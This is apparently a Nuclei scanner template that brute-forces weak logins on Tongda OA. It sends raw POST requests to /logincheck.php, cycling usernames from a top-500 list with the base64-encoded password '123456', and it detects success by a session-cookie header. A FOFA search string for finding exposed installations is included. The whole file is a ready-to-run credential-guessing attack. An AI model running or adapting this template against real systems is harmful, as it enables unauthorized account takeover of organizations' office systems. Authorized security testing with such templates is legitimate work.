http:
    - attack: sniper
      matchers:
        - part: header
          type: word
          words:
            - USER_NAME_COOKIE
      matchers-condition: and
      payloads:
        username: top500.txt
      raw:
        - |
          POST /logincheck.php HTTP/1.1
          Host: {{Hostname}}
          Connection: keep-alive
          Content-Length: 48
          Cache-Control: max-age=0
          Upgrade-Insecure-http: 1
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
          Accept-Encoding: gzip, deflate
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,zh-TW;q=0.5
          Cookie: PHPSESSID=th88kj3ebpt7qvg3ircnmuo0u6; KEY_RANDOMDATA=7578

          UNAME={{username}}&PASSWORD=MTIzNDU2&encode_type=1
id: tongda-OA-weak-password
info:
    author: rhbb
    description: 通达OA弱口令爆破
    fofa: app="TDXK-通达OA"
    name: tongda-OA-weak-password
    reference: https://github.com
    severity: critical
    tags:
        - weak-password
